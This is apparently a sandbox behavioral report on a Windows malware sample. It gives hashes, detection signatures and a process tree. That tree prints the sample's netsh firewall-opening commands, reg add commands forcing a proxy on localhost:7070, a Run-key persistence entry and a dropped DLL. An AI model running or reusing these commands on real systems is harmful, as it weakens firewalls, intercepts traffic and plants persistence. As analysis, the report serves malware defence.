Analysis
-
max time kernel
145s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
29-12-2023 22:55
Behavioral task
behavioral1
Sample
063f675afa71cad1702c4629693904fa.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
063f675afa71cad1702c4629693904fa.exe
Resource
win10v2004-20231215-en
General
-
Target
063f675afa71cad1702c4629693904fa.exe
-
Size
15KB
-
MD5
063f675afa71cad1702c4629693904fa
-
SHA1
1b5e9869af970f619a9d0ccdbe914e4b079ff84c
-
SHA256
34da48ccb02257cffb25281ff8433bae1b94dbfaa95afe0a3a94c419fd4214c7
-
SHA512
7837406f686461aa96c59f08ee446162444f8f50869cfa9ae4564019533fd70632b558dc143755f12c819e0f02fc6e13137b3cb96036d9e518bed5a30d1a3f40
-
SSDEEP
192:dYVl8TAAMfhPTnmPIkglNe0LsEkLrLZxWUevQtDpcuajBcxaoVF6B7y:d1qhLYHgfXOrfsQtt9rVF6y
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 2444 netsh.exe 2788 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000d0000000122e8-19.dat acprotect -
Deletes itself 1 IoCs
pid Process 3052 cmd.exe -
Loads dropped DLL 4 IoCs
pid Process 2572 rundll32.exe 2572 rundll32.exe 2572 rundll32.exe 2572 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2276-0-0x0000000000400000-0x000000000040A000-memory.dmp upx behavioral1/memory/3052-11-0x0000000000130000-0x000000000013A000-memory.dmp upx behavioral1/files/0x000d0000000122e8-19.dat upx behavioral1/memory/2572-20-0x0000000010000000-0x000000001000A000-memory.dmp upx behavioral1/memory/2572-21-0x0000000010000000-0x000000001000A000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\nfr = "rundll32.exe nfr.dll,ServiceMain /pid=6007" reg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\nfr.dll cmd.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 2276 wrote to memory of 3052 2276 063f675afa71cad1702c4629693904fa.exe 28 PID 2276 wrote to memory of 3052 2276 063f675afa71cad1702c4629693904fa.exe 28 PID 2276 wrote to memory of 3052 2276 063f675afa71cad1702c4629693904fa.exe 28 PID 2276 wrote to memory of 3052 2276 063f675afa71cad1702c4629693904fa.exe 28 PID 3052 wrote to memory of 2704 3052 cmd.exe 30 PID 3052 wrote to memory of 2704 3052 cmd.exe 30 PID 3052 wrote to memory of 2704 3052 cmd.exe 30 PID 3052 wrote to memory of 2704 3052 cmd.exe 30 PID 3052 wrote to memory of 2768 3052 cmd.exe 31 PID 3052 wrote to memory of 2768 3052 cmd.exe 31 PID 3052 wrote to memory of 2768 3052 cmd.exe 31 PID 3052 wrote to memory of 2768 3052 cmd.exe 31 PID 3052 wrote to memory of 2444 3052 cmd.exe 32 PID 3052 wrote to memory of 2444 3052 cmd.exe 32 PID 3052 wrote to memory of 2444 3052 cmd.exe 32 PID 3052 wrote to memory of 2444 3052 cmd.exe 32 PID 3052 wrote to memory of 2788 3052 cmd.exe 33 PID 3052 wrote to memory of 2788 3052 cmd.exe 33 PID 3052 wrote to memory of 2788 3052 cmd.exe 33 PID 3052 wrote to memory of 2788 3052 cmd.exe 33 PID 3052 wrote to memory of 2660 3052 cmd.exe 34 PID 3052 wrote to memory of 2660 3052 cmd.exe 34 PID 3052 wrote to memory of 2660 3052 cmd.exe 34 PID 3052 wrote to memory of 2660 3052 cmd.exe 34 PID 3052 wrote to memory of 2000 3052 cmd.exe 35 PID 3052 wrote to memory of 2000 3052 cmd.exe 35 PID 3052 wrote to memory of 2000 3052 cmd.exe 35 PID 3052 wrote to memory of 2000 3052 cmd.exe 35 PID 3052 wrote to memory of 2728 3052 cmd.exe 36 PID 3052 wrote to memory of 2728 3052 cmd.exe 36 PID 3052 wrote to memory of 2728 3052 cmd.exe 36 PID 3052 wrote to memory of 2728 3052 cmd.exe 36 PID 3052 wrote to memory of 2608 3052 cmd.exe 37 PID 3052 wrote to memory of 2608 3052 cmd.exe 37 PID 3052 wrote to memory of 2608 3052 cmd.exe 37 PID 3052 wrote to memory of 2608 3052 cmd.exe 37 PID 3052 wrote to memory of 2676 3052 cmd.exe 38 PID 3052 wrote to memory of 2676 3052 cmd.exe 38 PID 3052 wrote to memory of 2676 3052 cmd.exe 38 PID 3052 wrote to memory of 2676 3052 cmd.exe 38 PID 3052 wrote to memory of 2612 3052 cmd.exe 39 PID 3052 wrote to memory of 2612 3052 cmd.exe 39 PID 3052 wrote to memory of 2612 3052 cmd.exe 39 PID 3052 wrote to memory of 2612 3052 cmd.exe 39 PID 3052 wrote to memory of 2564 3052 cmd.exe 40 PID 3052 wrote to memory of 2564 3052 cmd.exe 40 PID 3052 wrote to memory of 2564 3052 cmd.exe 40 PID 3052 wrote to memory of 2564 3052 cmd.exe 40 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 3052 wrote to memory of 2572 3052 cmd.exe 41 PID 2572 wrote to memory of 2976 2572 rundll32.exe 42 PID 2572 wrote to memory of 2976 2572 rundll32.exe 42 PID 2572 wrote to memory of 2976 2572 rundll32.exe 42 PID 2572 wrote to memory of 2976 2572 rundll32.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\063f675afa71cad1702c4629693904fa.exe"C:\Users\Admin\AppData\Local\Temp\063f675afa71cad1702c4629693904fa.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\cmd.execmd /c c:\nfr.bat2⤵
- Deletes itself
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\063f675afa71cad1702c4629693904fa.exe"C:\Users\Admin\AppData\Local\Temp\063f675afa71cad1702c4629693904fa.exe" /13⤵PID:2704
-
-
C:\Windows\SysWOW64\netsh.exenetsh add allowedprogram "C:\Windows\System32\rundll32.exe" nfr ENABLE3⤵PID:2768
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 80 nfr ENABLE3⤵
- Modifies Windows Firewall
PID:2444
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 7070 nfr ENABLE3⤵
- Modifies Windows Firewall
PID:2788
-
-
C:\Windows\SysWOW64\netsh.exenetsh winhttp set proxy proxy-server="http=localhost:7070"3⤵PID:2660
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7070" /f3⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7070" /f3⤵PID:2728
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f3⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyOverride /d "*.local;<local>" /f3⤵PID:2676
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f3⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 01 /f3⤵PID:2564
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe nfr.dll,ServiceMain /pid=60073⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v nfr /d "rundll32.exe nfr.dll,ServiceMain /pid=6007" /f4⤵
- Adds Run key to start application
PID:2976
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b858fe451631cfee4fe6455c2d442911
SHA1952ade0f4312a7b7c4d290d5494fdcc9fa60f3b9
SHA256db365ffc15d95ad0cedb44c2a17914642eec34af017e4a0b94aefd9051101956
SHA512e6a98b356cd399bba9440e9255c93b46d9bf7324ae68c109e3708292b4b26730ff744b3ccae8f397837e4055f3e182a822bf3fe03c74dc5af681fbf36cee9635
-
Filesize
10KB
MD55329c63e5756ea2189ef8054a2d21397
SHA1a0e2df28e41ed189ebe9d1f934d4123ee1f42693
SHA2563abd88eb4b0a9abc4a9a07f6bc36c9ed851ad9627a24e33421a877cf2abfbaa5
SHA512f0858050a8951838a4f384e0986b3489341882456a7772b18a427e2bf341dcd623785ec403404de5f5800f7b559d05a52044689cc02cafcd43ecc39019514875